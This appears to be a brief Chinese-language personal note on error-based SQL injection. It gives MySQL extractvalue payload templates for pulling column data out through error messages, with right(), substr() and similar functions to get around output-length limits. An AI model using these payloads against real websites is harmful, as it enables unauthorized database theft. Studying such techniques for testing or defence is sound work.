报错注入.md

利用某些sql函数出错时回显错误信息包含参数值的特性，获得需要的信息

...^extractvalue(1,concat(0x5c,<payload>))

e.g.

...^extractvalue(1,concat(0x5c,(select(<columns>)from(<table_name>))))

对于回显有字数上限的使用right函数包裹<columns>，以获得后半部分

...^extractvalue(1,concat(0x5c,(select(right(<columns>))from(<table_name>))))

也可以使用reverse、substr、mid、regexp这些，总之灵活运用QwQ

#Web #SQL注入 #报错注入